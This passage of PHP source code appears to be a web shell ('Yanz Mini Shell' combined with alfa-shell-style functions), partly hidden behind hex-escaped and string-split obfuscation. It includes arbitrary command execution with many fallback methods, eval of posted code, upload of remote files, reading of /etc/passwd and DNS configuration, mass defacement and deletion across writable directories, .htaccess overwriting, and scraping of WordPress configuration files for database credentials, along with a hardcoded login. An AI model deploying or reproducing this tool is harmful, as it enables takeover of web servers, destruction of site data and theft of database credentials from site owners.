64\x20\x72\x65\144\x3b\xa\x20\x20\40\40\x62\x61\x63\153\147\162\157\165\x6e\x64\x3a\x20\162\145\144\73\xa\x20\40\x20\x20\143\157\x6c\157\x72\x3a\x20\167\150\151\x74\145\x3b\12\40\40\x7d\12\40\x20\x2e\153\x6f\x74\x61\153\x20\x7b\12\x20\x20\40\40\157\166\145\x72\146\154\157\167\72\40\x61\x75\x74\157\73\xa\x20\x20\40\40\x62\157\162\x64\145\x72\x3a\40\61\160\x78\x20\x73\157\154\x69\144\x20\x77\x68\151\x74\x65\73\xa\40\40\40\x20\160\x61\x64\144\151\x6e\147\72\40\61\x30\160\170\x3b\xa\40\40\40\40\x63\157\154\157\x72\72\40\167\x68\x69\x74\x65\x3b\xa\x20\40\175\xa\x20\40\56\x6c\x20\x7b\xa\40\x20\x20\x20\146\154\157\x61\x74\72\40\x6c\145\146\164\x3b\xa\x20\x20\40\x20\x77\151\144\x74\150\x3a\40\x35\60\45\73\12\40\40\175\12\40\x20\56\162\x20\173\xa\x20\40\x20\40\146\154\x6f\x61\x74\72\x20\162\151\x67\x68\x74\x3b\12\40\40\x20\x20\167\151\144\164\x68\x3a\x20\x35\x30\x25\x3b\xa\40\40\x20\40\x74\x65\170\x74\55\141\154\151\147\x6e\x3a\x20\162\151\x67\x68\x74\73\12\40\x20\x7d\xa\40\x20\x2e\154\x31\40\x7b\xa\x20\x20\40\40\146\x6c\x6f\141\164\x3a\x20\x6c\x65\x66\164\73\12\40\40\x20\40\167\151\144\x74\x68\x3a\40\62\60\x25\73\xa\40\40\40\40\142\157\162\x64\145\162\72\40\x31\x70\x78\40\x73\x6f\154\151\144\40\x77\x68\151\x74\x65\x3b\12\40\x20\40\40\160\x61\144\144\151\156\x67\x3a\x20\61\60\160\170\73\xa\40\x20\175\xa\x20\x20\x2e\162\x31\x20\x7b\xa\x20\x20\40\x20\146\x6c\157\x61\x74\72\x20\162\x69\147\x68\x74\x3b\12\x20\40\x20\40\167\151\144\x74\x68\72\40\x37\65\x25\x3b\xa\40\x20\40\40\x62\x6f\x72\x64\x65\162\72\x20\61\x70\170\40\163\x6f\154\151\144\x20\x77\150\x69\x74\145\x3b\xa\x20\40\40\40\160\141\144\144\x69\x6e\x67\x3a\x20\x31\x30\x70\170\x3b\12\x20\40\175\xa\40\40\151\x6e\160\x75\x74\x20\x7b\xa\40\x20\40\40\x62\x61\143\x6b\147\x72\x6f\165\x6e\144\72\40\x77\150\151\164\145\x3b\xa\40\40\40\40\x63\157\154\x6f\162\x3a\x20\142\x6c\141\x63\153\x3b\xa\40\40\x20\x20\x62\x6f\x72\x64\145\x72\72\x20\x31\x70\170\40\163\157\154\x69\x64\40\x77\x68\x69\x74\145\x3b\xa\x20\x20\x20\x20\160\x61\144\x64\151\x6e\147\72\40\x35\160\x78\73\xa\x20\x20\175\12\x20\40\x2e\x66\x69\154\x65\40\173\12\40\40\40\x20\x77\151\144\164\150\72\x20\61\60\60\45\x3b\xa\40\x20\40\40\x68\x65\x69\147\x68\x74\x3a\40\65\x30\x25\x3b\xa\40\x20\175\12\x3c\x2f\163\164\x79\154\145\x3e\12\74\x64\151\x76\40\x63\154\141\163\163\75\42\x62\141\x72\141\164\x61\x73\x22\76\12\x20\40\x3c\144\151\x76\40\x63\154\141\x73\163\75\42\x6c\42\x3e\12\x20\x20\x20\x20\x59\x61\x6e\x7a\x20\x4d\151\156\151\x20\123\x68\x65\x6c\x6c\xa\40\x20\74\x2f\x64\151\x76\76\12\40\x20\x3c\144\151\x76\40\143\154\x61\x73\163\75\x22\162\42\x3e\12\x20\40\40\x20\40\x20\x3c\x61\40\143\154\x61\x73\x73\x3d\x22\x61\55\x62\141\162\42\40\x68\162\145\x66\x3d\42\x3f\160\141\147\145\75\142\x6c\141\156\x6b\42\76\x5b\137\135\x3c\57\141\x3e\xa\x20\40\40\40\x20\40\x3c\141\40\x63\154\x61\163\x73\75\x22\x61\55\x62\x61\x72\x22\x20\x68\x72\145\146\75\x22\x3f\160\x61\x67\145\x3d\x62\154\141\x6e\153\42\x3e\133\x2d\x5d\74\57\141\x3e\12\x20\40\x20\40\x20\x20\74\x61\40\x63\x6c\141\x73\x73\75\x22\x63\154\x6f\163\x65\42\40\150\x72\145\x66\75\42\x3f\42\76\133\x58\x5d\74\x2f\141\76\12\40\x20\74\x2f\x64\151\166\x3e\12\x3c\x2f\144\151\166\x3e\12\74\144\151\166\x20\143\x6c\x61\x73\x73\x3d\42\153\157\x74\141\153\x22\x3e\12\x20\x20\133\x20\74\x61\x20\x68\x72\x65\146\75\x22\x3f\x79\x6e\x7a\x6d\151\156\151\75"; goto ODT3T; EGBMG: echo "\74\x66\x6f\162\155\x20\x65\x6e\x63\x74\x79\160\145\x3d\x27\155\165\154\x74\151\x70\x61\x72\164\x2f\146\157\162\155\55\x64\x61\x74\x61\x27\40\x6d\145\x74\150\x6f\x64\75\x27\x70\x6f\x73\164\47\76\xa\40\x20\40\40\40\40\x20\x20\122\x65\x6e\x61\x6d\145\40\x54\x68\151\163\x20\106\157\x6c\144\145\x72\x20\x3a\x20\74\x69\156\x70\165\164\x20\x74\171\x70\145\x3d\47\x74\145\170\x74\47\40\x6e\x61\x6d\x65\x3d\47\x72\x65\156\x61\x6d\145\137\146\157\x6c\x64\x65\x72\x27\x3e\x3c\151\156\160\x75\x74\x20\164\x79\x70\145\75\47\x73\x75\142\x6d\x69\x74\47\x20\166\141\154\165\145\x3d\x27\x52\145\156\x61\155\x65\x27\x3e\12\x20\x20\x20\x20\40\x20\x20\40\x3c\x61\x20\x63\154\x61\x73\x73\75\x27\142\141\162\141\164\141\163\x27\x20\x68\162\x65\146\75\47\77\x72\x6d\x66\157\x6c\x64\x65\162\75{$IpbLa}\x27\x3e\x52\145\x6d\157\166\145\x20\124\150\x69\x73\x20\106\157\x6c\x64\145\x72\x3c\57\141\76\xa\40\40\40\40\40\40\x20\x20\x3c\x2f\x66\x6f\162\x6d\x3e\xa\40\40\40\x20\40\40\x20\x20\74\x68\162\76\12\40\40\x20\40\x20\x20\40\40"; goto sgmH6; T684K: eval($_SESSION["\143\157\x64\145"]); goto a1vT5; TTkuc: echo "\x3c\x66\x6f\x72\x6d\x20\x65\x6e\x63\164\171\x70\x65\x3d\47\155\x75\x6c\164\151\160\x61\x72\x74\57\146\x6f\x72\x6d\55\x64\141\x74\141\47\x20\155\x65\164\x68\x6f\144\75\47\x70\157\x73\164\x27\x3e\12\40\x20\x20\40\x20\x20\x20\x20\40\40\x3c\x74\x65\x78\x74\141\x72\x65\141\x20\x63\154\x61\163\x73\x3d\47\x66\x69\154\145\47\40\156\x61\x6d\145\x3d\x27\x65\x64\x69\164\137\146\x69\x6c\x65\47\76" . htmlspecialchars(file_get_contents($_GET["\146\x69\x6c\145"])) . "\74\57\164\x65\170\164\x61\162\x65\141\76\xa\x20\x20\x20\40\x20\40\40\x20\x20\40\74\142\x72\x3e\74\x62\162\76\xa\x20\40\x20\40\40\40\x20\40\x20\x20\74\x69\x6e\x70\x75\164\40\164\171\160\145\75\47\x73\165\142\155\x69\x74\x27\x20\x76\x61\154\x75\x65\x3d\x27\x53\141\166\x65\40\x46\x69\x6c\145\47\x3e\xa\40\x20\40\40\40\40\40\x20\x20\40\74\57\x66\x6f\162\x6d\76\12\x20\x20\40\40\40\40\x20\x20\40\x20"; goto qZgfY; o5XnE: vQPUY: goto Hb7f4; DTrTz: echo "\131\x61\x6e\172\x40{$imQ_V}\72\x7e\40\44\x20" . $_POST["\163\150\145\x6c\x6c"]; goto HtQ91; KbXXF: echo "\133\x2d\135\x20\x46\141\151\154\x65\144\40\x3a\40" . $_FILES["\165\160"]["\x6e\141\x6d\x65"]; goto fzcmM; UWFHE: VZEb1: goto Dqxca; OUauJ: echo "\46\145\x64\x69\164\75\164\162\165\x65\42\x3e\x45\x64\x69\x74\x3c\57\141\x3e\40\x5d\12\x5b\x20\74\141\x20\150\x72\x65\x66\x3d\42\x3f\x66\151\x6c\x65\75"; goto PAWWk; Fhr7E: frX5K: goto IFKLz; iqnbj: echo "\74\164\151\164\x6c\x65\x3e\x59\x61\156\172\x20\155\151\x6e\151\40\x53\150\x65\x6c\154\74\x2f\x74\151\x74\x6c\145\x3e\12"; goto uQfyX; rI1sO: echo "\40\x20\74\x2f\x64\151\166\x3e\xa\74\x2f\144\x69\x76\x3e\xa\x3c\144\151\166\x20\143\154\x61\x73\x73\x3d\42\153\157\164\141\x6b\x22\76\12\x20\x20\74\x64\151\x76\40\x63\x6c\141\163\163\75\42\154\42\76\12\40\40\x20\x20\106\162\x65\145\x20\x53\x70\141\x63\145\x20\72\40"; goto sts1l; RL6rR: $_SESSION["\x63\x6f\144\145"] = "\x3f\76" . $_POST["\x63\x6f\x64\x65"]; goto Qe5sr; SSAWa: if (!$_GET["\x66\x69\154\x65"]) { goto hGvRz; } goto XxuiP; dNB8T: if (fwrite($MAIiK, $_POST["\x69\163\151\x5f\x66\x69\x6c\145"])) { goto iPDSP; } goto INtVq; INtVq: echo "\x3c\163\143\162\151\160\164\76\x61\x6c\x65\x72\164\50\x27\103\162\x65\x61\164\145\144\x20\106\x69\x6c\x65\x20\106\x61\x69\x6c\x65\144\x20\x21\x21\41\47\51\73\40\x77\151\x6e\144\x6f\x77\56\x6c\157\143\x61\164\151\157\x6e\x20\75\x20\x27\x3f\47\73\x3c\x2f\x73\x63\x72\151\160\x74\x3e"; goto TfllX; YFF_y: echo "\74\x73\x63\162\x69\x70\164\76\x61\x6c\145\x72\164\50\x27\x46\151\x6c\145\x20\x52\145\x6e\141\x6d\145\x64\40\41\x21\x21\47\x29\x3b\40\167\x69\156\144\x6f\x77\56\x6c\157\143\x61\164\151\157\156\40\x3d\x20\47\x3f\x27\x3b\74\57\x73\143\x72\x69\x70\164\x3e"; goto h6s2T; Dqxca: $Co0jn = "\x3c\x3f\160\150\160\40\145\143\150\157\x20\x27\110\x65\154\154\x6f\x20\127\x6f\162\x6c\144\x27\73\40\x3f\76"; goto SOpYr; R51wP: zChWX: goto KoGzd; eGjKb: $IpbLa = $_SESSION["\144\x69\162"]; goto xzk8N; RpX1u: echo "\x20\102\171\x74\x65\xa\40\40\x3c\57\x64\x69\166\x3e\xa\x20\40\74\144\151\x76\x20\x63\x6c\141\x73\163\75\x22\x72\x22\x3e\12\40\40\74\x2f\144\x69\x76\76\12\74\57\x64\151\166\x3e\xa";
exit();}
//MINISHELLINCLUDEANITISPASIPOSTBLOCKED
else {
echo "";
echo "
";
$CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's';
$aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . '';
$OVpGNqqFZs = 'e' . 'v' . 'al';
$psDEwGhsxg = 'gz' . 'inf' . 'late';
$allowed_upload_extensions = '';
$p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : '');
$root_path = @GeTcwd();
defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path);
define('FM_PATH', $p);
defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions);
if(isset($_POST['type']) && $_POST['type'] == "upload" && !empty($_REQUEST["uploadurl"])) {
$path = FM_ROOT_PATH;
if (FM_PATH != '') {
$path .= '/' . FM_PATH;
}
function event_callback ($message) {
global $callback;
echo json_encode($message);
}
function get_file_path () {
global $path, $fileinfo, $temp_file;
return $path."/".basename($fileinfo->name);
}
$url = !empty($_REQUEST["uploadurl"]) && preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null;
//prevent 127.* domain and known ports
$domain = parse_url($url, PHP_URL_HOST);
$port = parse_url($url, PHP_URL_PORT);
$knownPorts = [22, 23, 25, 3306];
if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) {
$err = array("message" => "URL is not allowed");
event_callback(array("Failed Upload!" => $err));
messages();
}
$use_curl = false;
$temp_file = tempnam(sys_get_temp_dir(), "upload-");
$fileinfo = new stdClass();
$fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20");
$allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false;
$ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION));
$isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;
$err = false;
if(!$isFileAllowed) {
$err = array("message" => "File extension is not allowed");
event_callback(array("Failed Upload!" => $err));
messages();
}
if (!$url) {
$success = false;
} else if ($use_curl) {
@$fp = fopen($temp_file, "w");
@$ch = curl_init($url);
curl_setopt($ch, CURLOPT_NOPROGRESS, false );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_FILE, $fp);
@$success = curl_exec($ch);
$curl_info = curl_getinfo($ch);
if (!$success) {
$err = array("message" => curl_error($ch));
}
@curl_close($ch);
fclose($fp);
$fileinfo->size = $curl_info["size_download"];
$fileinfo->type = $curl_info["content_type"];
} else {
$ctx = stream_context_create();
@$success = copy($url, $temp_file, $ctx);
if (!$success) {
$err = error_get_last();
}
}
if ($success) {
$success = rename($temp_file, strtok(get_file_path(), '?'));
}
if ($success) {
event_callback(array("Done Uploaded In Home Directory Shell ! at Directory =[".$root_path."]" => $fileinfo));
messages();
} else {
unlink($temp_file);
if (!$err) {
$err = array("message" => "Invalid url parameter");
}
event_callback(array("Failed Upload!" => $err));
messages();
}
}
if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''))
{
function vcnvSCZgBz($data)
{
if (empty($data)) return;
$b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
$ac = 0;
$enc = '';
$tmp_arr = array();
if (!$data)
{
return $data;
}
do
{
$o1 = $aztJtafUXm($data, $i++);
$o2 = $aztJtafUXm($data, $i++);
$o3 = $aztJtafUXm($data, $i++);
$bits = $o1 << 16 | $o2 << 8 | $o3;
$h1 = $bits >> 18 & 0x3f;
$h2 = $bits >> 12 & 0x3f;
$h3 = $bits >> 6 & 0x3f;
$h4 = $bits & 0x3f;
$tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
}
while ($i < strlen($data));
$enc = implode($tmp_arr, '');
$r = (strlen($data) % 3);
return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3));
}
function charCodeAt($data, $char)
{
return ord(substr($data, $char, 1));
}
function charAt($data, $char)
{
return substr($data, $char, 1);
}
}
else
{
function vcnvSCZgBz($s)
{
$b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '';
return $b($s);
}
}
if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''))
{
function zRtSHsbTzV($input)
{
if (empty($input)) return;
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
$i = 0;
$output = "";
$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
do
{
$enc1 = strpos($keyStr, substr($input, $i++, 1));
$enc2 = strpos($keyStr, substr($input, $i++, 1));
$enc3 = strpos($keyStr, substr($input, $i++, 1));
$enc4 = strpos($keyStr, substr($input, $i++, 1));
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output . chr((int)$chr1);
if ($enc3 != 64)
{
$output = $output . chr((int)$chr2);
}
if ($enc4 != 64)
{
$output = $output . chr((int)$chr3);
}
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
}
while ($i < strlen($input));
return $output;
}
}
else
{
function zRtSHsbTzV($s)
{
$b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '';
return $b($s);
}
}
function __ZW5jb2Rlcg($s)
{
return vcnvSCZgBz($s);
}
function __ZGVjb2Rlcg($s)
{
return zRtSHsbTzV($s);
}
function alfaEx($in,$re=false,$cgi=true,$all=false){
$data = _alfa_php_cmd($in,$re);
if(empty($data)&&$cgi||$all){
if($GLOBALS['sys']=='unix'){
if(strlen(_alfa_php_cmd("whoami"))==0||$all){
$cmd = _alfa_cgicmd($in);
if(!empty($cmd)){
return $cmd;
}
}
}
}
return $data;
}
function _alfa_php_cmd($in,$re=false){
$out='';
try{
if($re)$in=$in." 2>&1";
if(function_exists('exec')){
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(function_exists("popen")&&function_exists("pclose")){
if(is_resource($f = @popen($in,"r"))){
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
}elseif(function_exists('proc_open')){
$pipes = array();
$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
$out=@stream_get_contents($pipes[1]);
}elseif(class_exists('COM')){
$alfaWs = new COM('WScript.shell');
$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
$stdout = $exec->StdOut();
$out=$stdout->ReadAll();
}
}catch(Exception $e){}
return $out;
}
function alfaGetCwd(){
if(function_exists("getcwd")){
return @getcwd();
}else{
return dirname($_SERVER["SCRIPT_FILENAME"]);
}
}
function _alfa_file_exists($file,$cgi=true){
if(@file_exists($file)){
return true;
}else{
if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
return true;
}
}
return false;
}
function alfaMakePwd(){
if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
return "/home/{user}/public_html/";
}
$document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
$public = end($document);
array_pop($document);
array_pop($document);
$path = implode("/", $document) . "/{user}/" . $public;
return $path;
}
function _alfa_file($file,$cgi=true){
$array = @file($file);
if(!$array){
if(strlen(alfaEx("id",false,$cgi))>0){
$data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
if(strlen($data)>0){
return explode("\n", $data);
}else{
return false;
}
}else{
return false;
}
}else{
return $array;
}
}
function alfaGetDomains($state = false){
$state = "named.conf";
$lines = array();
$lines = _alfa_file('/etc/named.conf');
if(!$lines){
$lines = @scandir("/etc/valiases/");
$state = "valiases";
if(!$lines){
$lines = @scandir("/var/named");
$state = "named";
if(!$lines && $state){
$lines = _alfa_file('/etc/passwd');
$state = "passwd";
}
}
}
return array("lines" => $lines, "state" => $state);
}
function _alfa_can_runCommand($cgi=true,$cache=true){
if(isset($_COOKIE["alfa_canruncmd"])&&$cache){
return true;
}
if(strlen(alfaEx("whoami",false,$cgi))>0){
$_COOKIE["alfa_canruncmd"] = true;
return true;
}
return false;
}
function tes($memek){
echo($memek);
}
function execute ($dir)
{
echo($dir);
echo '
';
echo 'Panggil Function All Dirs';
echo '
';
$content = '
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
Order Allow,Deny
Allow from all
';
$md5content = md5($content);
$dir = $dir;
/*删除自己*/
$tempFile = md5($_SERVER["HTTP_HOST"].time());
file_put_contents($tempFile, "1");
/*如果缓存文件不存在那么不执行*/
if(file_exists($tempFile)){
$arrDirs = recurDirRW($dir);
foreach($arrDirs as $path){
if(file_exists($path . "/" . $tempFile)){
echo $path.'adalah direktori root, hentikan eksekusi!
';
}else{
$htfile = $path . "/.htaccess";
chmod($htfile, 0777);
file_put_contents($htfile, $content);
chmod($htfile, 0444);
$thecontent = file_get_contents($path."/.htaccess");
$theContentMd5 = md5($thecontent);
if($theContentMd5 == $md5content){
echo $htfile.'FIXED HTACCESS selesai!
';
}else{
echo $htfile.'Fix HTAcces gagal!
';
}
}
}
/*执行完,删除缓存文件*/
}else{
echo '根目录没有写权限!放弃执行!root dir is not writeable, abord!
';
}
/**
* 遍历目录,显示可读可写子目录
*/
}
function execute1 ($dir)
{
echo($dir);
echo '
';
echo 'Panggil Function Not All Dirs';
echo '
';
$content = '
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
Order Allow,Deny
Allow from all
';
$md5content = md5($content);
$dir = $dir;
/*删除自己*/
$tempFile = md5($_SERVER["HTTP_HOST"].time());
file_put_contents($tempFile, "1");
/*如果缓存文件不存在那么不执行*/
if(file_exists($tempFile)){
$arrDirs = recurDirRW1($dir);
foreach($arrDirs as $path){
if(file_exists($path . "/" . $tempFile)){
echo $path.'adalah direktori root, hentikan eksekusi!
';
}else{
$htfile = $path . "/.htaccess";
chmod($htfile, 0777);
file_put_contents($htfile, $content);
chmod($htfile, 0444);
$thecontent = file_get_contents($path."/.htaccess");
$theContentMd5 = md5($thecontent);
if($theContentMd5 == $md5content){
echo $htfile.'FIXED HTACCESS selesai!
';
}else{
echo $htfile.'Fix HTAcces gagal!
';
}
}
}
/*执行完,删除缓存文件*/
}else{
echo 'root dir is not writeable, abord!
';
}
/**
* 遍历目录,显示可读可写子目录
*/
}
function execute2 ($dir,$dirpub)
{
echo($dir.$dirpub);
echo '
';
echo 'Panggil Function Not All Dirs';
echo '
';
$content = '
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
Order Allow,Deny
Allow from all
';
$md5content = md5($content);
$dir = $dir;
/*删除自己*/
$tempFile = md5($_SERVER["HTTP_HOST"].time());
file_put_contents($tempFile, "1");
/*如果缓存文件不存在那么不执行*/
if(file_exists($tempFile)){
$arrDirs = recurDirRW1($dir);
foreach($arrDirs as $path){
if(file_exists($path . "/" . $dirpub . $tempFile)){
echo $path.'adalah direktori root, hentikan eksekusi!
';
}else{
$htfile = $path . "/". $dirpub .".htaccess";
chmod($htfile, 0777);
file_put_contents($htfile, $content);
chmod($htfile, 0444);
$thecontent = file_get_contents($path."/.htaccess");
$theContentMd5 = md5($thecontent);
if($theContentMd5 == $md5content){
echo $htfile.'FIXED HTACCESS gagal!
';
}else{
echo $htfile.'Fix HTAcces selesai!
';
}
}
}
/*执行完,删除缓存文件*/
}else{
echo 'root dir is not writeable, abord!
';
}
/**
* 遍历目录,显示可读可写子目录
*/
}
function recurDirRW($pathName)
{
//将结果保存在result变量中
$result = array();
$temp = array();
//判断传入的变量是否是目录
if(!is_dir($pathName) || !is_readable($pathName) || !is_writeable($pathName)) {
return null;
}
//取出目录中的文件和子目录名,使用scandir函数
$allFiles = scandir($pathName);
//遍历他们
foreach($allFiles as $fileName) {
//判断是否是.和..因为这两个东西神马也不是。。。
if(in_array($fileName, array('.', '..'))) {
continue;
}
//路径加文件名
$fullName = $pathName.'/'.$fileName;
//如果是目录的话就继续遍历这个目录
if(is_dir($fullName) && is_readable($fullName) && is_writeable($fullName)) {
//将这个目录中的文件信息存入到数组中
$result[] = $fullName;
$temp = recurDirRW($fullName);
$result = array_merge($result, $temp);
}
}
return $result;
}
function recurDirRW1($pathName)
{
//将结果保存在result变量中
$result = array();
$temp = array();
//判断传入的变量是否是目录
if(!is_dir($pathName) || !is_readable($pathName) || !is_writeable($pathName)) {
return null;
}
//取出目录中的文件和子目录名,使用scandir函数
$allFiles = scandir($pathName);
//遍历他们
foreach($allFiles as $fileName) {
//判断是否是.和..因为这两个东西神马也不是。。。
if(in_array($fileName, array('.', '..'))) {
continue;
}
$fullName = $pathName.'/'.$fileName;
if(is_dir($fullName) && is_readable($fullName) && is_writeable($fullName)){
$result[] = $fullName;
}
}
return $result;
}
function hapus_massal($dir,$namafile){
if(is_writable($dir)){
$dira = scandir($dir);
foreach($dira as $dirb){
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.'){
if(file_exists("$dir/$namafile")){
chmod("$dir/$namafile", 0777);
unlink("$dir/$namafile");
}
}elseif($dirb === '..'){
if(file_exists("".dirname($dir)."/$namafile")){
chmod("".dirname($dir)."/$namafile", 0777);
unlink("".dirname($dir)."/$namafile");
}
}else{
if(is_dir($dirc)){
if(is_writable($dirc)){
if($lokasi){
echo "$lokasi > Terhapusn";
chmod($lokasi, 0777);
unlink($lokasi);
$massdel = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
function color($bold = 1, $colorid = null, $string = null) {
$color = array(
"", # 0 off
"
", # 1 red
"", # 2 lime
"", # 3 white
"", # 4 gold
);
return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid];
}
function path() {
if(isset($_GET['dir'])) {
$dir = str_replace("\\", "/", $_GET['dir']);
@chdir($dir);
} else {
$dir = str_replace("\\", "/", getcwd());
}
return $dir;
}
function massdeface($dir, $file, $filename, $type = null) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === "." || $dir_ === "..") {
file_put_contents($location, $file);
}
else {
if(is_dir($path) AND is_writable($path)) {
print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)." ";
file_put_contents($location, $file);
if($type === "-alldir") {
massdeface($path, $file, $filename, "-alldir");
}
}
}
}
}
function massdefacesubdir($dir, $dsubdir, $file, $filename, $type = null) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path = "$dir/$dir_";
$pathsubdir = "$path/$dsubdir";
$location = "$path/$dsubdir/$filename";
if($dir_ === "." || $dir_ === "..") {
file_put_contents($location, $file);
}
else {
if(is_dir($pathsubdir) AND is_writable($pathsubdir)) {
print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)." ";
file_put_contents($location, $file);
if($type === "-alldir") {
massdefacesubdir($pathsubdir, $file, $filename, "-alldir");
}
}
}
}
}
function massdelete($dir, $filename) {
$scandir = scandir($dir);
foreach($scandir as $dir_) {
$path = "$dir/$dir_";
$location = "$path/$filename";
if($dir_ === '.') {
if(file_exists("$dir/$filename")) {
unlink("$dir/$filename");
}
}
elseif($dir_ === '..') {
if(file_exists(dirname($dir)."/$filename")) {
unlink(dirname($dir)."/$filename");
}
}
else {
if(is_dir($path) AND is_writable($path)) {
if(file_exists($location)) {
print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)." ";
unlink($location);
massdelete($path, $filename);
}
}
}
}
}
function executewpautoedit(){
$Username = "yanz@123457";
$Password = "yanz@123457";
$pass = md5($Password);
$title = htmlspecialchars($_POST['title']);
$id = $_POST['id'];
$content = $_POST['content'];
$postname = $_POST['name'];
function anucurl($sites) {
$ch = curl_init($sites);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION,true);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$link = explode("\r\n", $_POST['link']);
foreach($link as $dir_config) {
$config = anucurl($dir_config);
preg_match("/define.*DB_NAME.*\"(.*)\"/", $config, $m);
$dbname1 = $m[1];
preg_match('/define.*DB_NAME.*\'(.*)\'/', $config, $m);
$dbname2 = $m[1];
$dbname = ("$dbname1$dbname2");
preg_match("/define.*DB_USER.*\"(.*)\"/", $config, $m);
$dbuser1 = $m[1];
preg_match('/define.*DB_USER.*\'(.*)\'/', $config, $m);
$dbuser2 = $m[1];
$dbuser = ("$dbuser1$dbuser2");
preg_match("/define.*DB_PASSWORD.*\"(.*)\"/", $config, $m);
$dbpass1 = $m[1];
preg_match('/define.*DB_PASSWORD.*\'(.*)\'/', $config, $m);
$dbpass2 = $m[1];
$dbpass = ("$dbpass1$dbpass2");
preg_match("/define.*DB_HOST.*\"(.*)\"/", $config, $m);
$dbhost1 = $m[1];
preg_match('/define.*DB_HOST.*\'(.*)\'/', $config, $m);
$dbhost2 = $m[1];
$dbhost = ("$dbhost1$dbhost2");
preg_match("/\\\$table_prefix.+?\"(.+?)\".+/", $config, $m);
$dbprefix0 = $m[1];
$dbprefix1 = HEx($config,"table_prefix = '","'");
$dbprefix2 = HEx($config,"table_prefix = '","'");
$dbprefix3 = HEx($config,"table_prefix= '","'");
$dbprefix4 = HEx($config,"table_prefix = '","'");
$dbprefix = ("$dbprefix0$dbprefix1$dbprefix2$dbprefix3$dbprefix4");
